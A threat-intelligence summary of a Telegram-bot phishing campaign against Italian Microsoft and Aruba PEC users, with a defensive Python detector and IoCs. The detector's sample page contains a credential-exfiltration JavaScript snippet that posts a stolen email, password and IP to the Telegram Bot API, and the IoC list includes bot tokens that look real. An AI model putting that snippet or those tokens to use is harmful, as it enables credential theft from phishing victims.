This analysis explores a phishing campaign targeting Italian users through fake Microsoft and Aruba PEC login pages, leveraging Telegram bots for data exfiltration. The campaign uses free hosting platforms like Notion and Glitch, employs straightforward phishing techniques, and remains active with low operational tempo. #PhishingCampaign #TelegramBots #CredentialHarvesting #Microsoft365 #ArubaPEC #ItalianUsers
Keypoints
- The phishing campaign targets Italian-speaking users, impersonating Microsoft (OneNote, Office365) and Aruba PEC login portals.
- Phishing pages are hosted on free platforms such as Notion workspaces, Glitch, Google Docs, and RenderForest.
- User credentials and IP addresses are exfiltrated via hardcoded Telegram bots using Telegram API tokens and chat IDs.
- The campaign has been active since at least early 2022, with recurring samples displaying minor visual changes but consistent exfiltration tactics.
- The attacker’s tooling is rudimentary, with low-quality phishing pages and no advanced evasion or obfuscation techniques beyond occasional URL encoding and Base64 encoding that appeared in earlier samples and was later dropped.
- Intercepting Telegram bot communications allowed researchers to profile victims and link multiple bots to a suspected threat actor account named “Don.”
- Victims include individuals and businesses primarily in Italy and the United States, across diverse sectors like logistics, certified email, consulting, and natural resources.
MITRE Techniques
- [T1566] Phishing – The campaign uses phishing pages impersonating legitimate login portals to collect user credentials (“phishing pages and email lures impersonating login portals for Microsoft services and Aruba PEC”).
- [T1071] Application Layer Protocol – Data exfiltration occurs via Telegram bots interacting through Telegram API calls (“credentials are exfiltrated via a Telegram bot, with the bot token and chat ID hardcoded directly into the phishing script”).
- [T1598] Phishing via Link – Victims are lured through URLs hosted on Notion and Glitch domains leading to counterfeit authentication pages (“URL chains: Notion → Glitch → Telegram API”).
- [T1552] Unsecured Credentials – Hardcoded Telegram bot tokens and chat IDs are used for data theft (“hardcoded directly into the phishing script”).
- [T1110] Brute Force (Indirect) – Use of credential harvesting for later access brokering rather than direct exploitation (“the campaign’s true value lies in access brokering, not execution”).
- [T1033] System Owner/User Discovery – The campaign collects victim IP addresses using the ipify service during the phishing flow (“uses the ipify.org service to retrieve the victim’s IP address”).
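The exfiltration pattern summarised above (a bot token and chat ID hardcoded in client-side script, an ipify lookup, then a Bot API sendMessage call) leaves artefacts that are easy to hunt for. The following is an added example, not code from the ANY.RUN analysis or from the campaign: it scans a page’s HTML/JS for those artefacts and flags proxy-log requests that carry a bot token to api.telegram.org. The regexes, the sample page and the proxy lines are constructed for the example, and the token in them is a placeholder, not one of the campaign’s IoCs.

```python
import re
from typing import List

# Telegram bot tokens look like <bot id>:<35-char secret>. The lookarounds stop
# the bot id from attaching to the "bot" prefix of an API URL and keep the
# secret from over-running into the next path segment.
TELEGRAM_TOKEN_RE = re.compile(r"(?<!\d)(\d{8,10}):([A-Za-z0-9_-]{35})(?![A-Za-z0-9_-])")
# Bot API host and the methods typically used to push text or files into a chat.
TELEGRAM_ENDPOINT_RE = re.compile(r"api\.telegram\.org/bot")
TELEGRAM_METHOD_RE = re.compile(r"/(sendMessage|sendDocument|sendPhoto)\b")
# chat_id as a JS variable, JSON field or query parameter.
CHAT_ID_RE = re.compile(r"chat_id\s*[=:]\s*['\"]?(-?\d{6,12})")
# Victim IP lookup through ipify, as described in the analysis.
IPIFY_RE = re.compile(r"https?://api\.ipify\.org[^\"'\s]*")


def scan_page(source: str) -> dict:
    """Return the exfiltration indicators found in a page's HTML/JS source."""
    tokens = sorted({f"{bot_id}:{secret}" for bot_id, secret in TELEGRAM_TOKEN_RE.findall(source)})
    return {
        "tokens": tokens,
        "chat_ids": sorted(set(CHAT_ID_RE.findall(source))),
        "methods": sorted(set(TELEGRAM_METHOD_RE.findall(source))),
        "ipify": sorted(set(IPIFY_RE.findall(source))),
        "telegram_endpoint": bool(TELEGRAM_ENDPOINT_RE.search(source)),
    }


def is_telegram_exfil_page(source: str) -> bool:
    """A bot token plus a chat id in client-side code is the campaign's signature."""
    found = scan_page(source)
    return bool(found["tokens"]) and bool(found["chat_ids"])


def flag_proxy_lines(lines: List[str]) -> List[str]:
    """Return proxy-log lines in which a browser sends a bot token to the Bot API.

    End-user browsers rarely talk to api.telegram.org/bot<token>/... directly, so
    such a request from a workstation is worth triage whichever bot it belongs to.
    """
    return [ln for ln in lines
            if TELEGRAM_ENDPOINT_RE.search(ln) and TELEGRAM_TOKEN_RE.search(ln)]


# Constructed placeholder token (assumption, not a real or campaign token).
PLACEHOLDER_TOKEN = "0000000000:" + "A" * 35

# Constructed sample page modelled on the flow the analysis describes.
SAMPLE_PAGE = """
<form id="login"><input name="email"><input name="pass" type="password"></form>
<script>
var token = "__TOKEN__";
var chat_id = "1234567890";
fetch("https://api.ipify.org?format=json").then(r => r.json()).then(j => {
  fetch("https://api.telegram.org/bot" + token + "/sendMessage?chat_id=" + chat_id +
        "&text=" + encodeURIComponent(email.value + ":" + pass.value + " " + j.ip));
});
</script>
""".replace("__TOKEN__", PLACEHOLDER_TOKEN)

# Constructed proxy-log lines; only the second is the exfiltration request.
SAMPLE_PROXY_LOG = [
    "1700000000.001 10.0.0.5 GET https://seabbz.notion.site/ 200",
    "1700000000.002 10.0.0.5 GET https://api.telegram.org/bot" + PLACEHOLDER_TOKEN
    + "/sendMessage?chat_id=1234567890&text=... 200",
    "1700000000.003 10.0.0.5 GET https://login.microsoftonline.com/ 200",
]

if __name__ == "__main__":
    print(scan_page(SAMPLE_PAGE))
    print("exfil page:", is_telegram_exfil_page(SAMPLE_PAGE))
    for line in flag_proxy_lines(SAMPLE_PROXY_LOG):
        print("FLAGGED:", line)
```

The page scan is meant for triage of a captured phishing page (for instance the HTML pulled from a urlscan.io or sandbox run); the proxy-log check is the matching network-side detection. Neither one depends on knowing the specific tokens listed in the IoC section, which matters because the actor rotates bots while keeping the same mechanism.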
Indicators of Compromise
- [Domain] Phishing infrastructure – studiosperandio[.]notion[.]site, gleaming-foregoing-quicksand[.]glitch[.]me, seabbz[.]notion[.]site, f004[.]backblazeb2[.]com, 25348255-1243060[.]renderforestsites[.]com
- [Domain] Urlscan.io related domains – inshared0-onenote-asx[.]pages[.]dev, onedriv-shared0-apx[.]pages[.]dev, hampshiredownsheepwales[.]com, kindly-tropical-icicle[.]glitch[.]me
- [Telegram Bot Tokens and Chat IDs] – 7547274214:AAE2ImiQOBUm1JXvTk0sXfZNaZP2J4wL9sE | 6475928726, 7072331661:AAEnFxNxOI162AVQUCmfDHMdy6s4fGrnTZY | 5308217415, 6741707974:AAHGfsh1hk8WVtAfcISXgpZCTL-bpHNvQ_E | 6475928726
- [File Hashes (SHA-256)] – 2049afb27b7d71b311ef83205ec8c1397ed9b705b4f84517471cc41c8c1f29d1, 8a1cecaf7c6df616fae15dca013cea78d209f0e813b9aa75964de1f813d614e0, 7e5a3bb0cff67b2c1ff50544f956a903a6ff364c006033c0887d17019875040e, and 7 more hashes.
Read more: https://any.run/cybersecurity-blog/cybersecurity-blog/adversary-telegram-bot-abuse/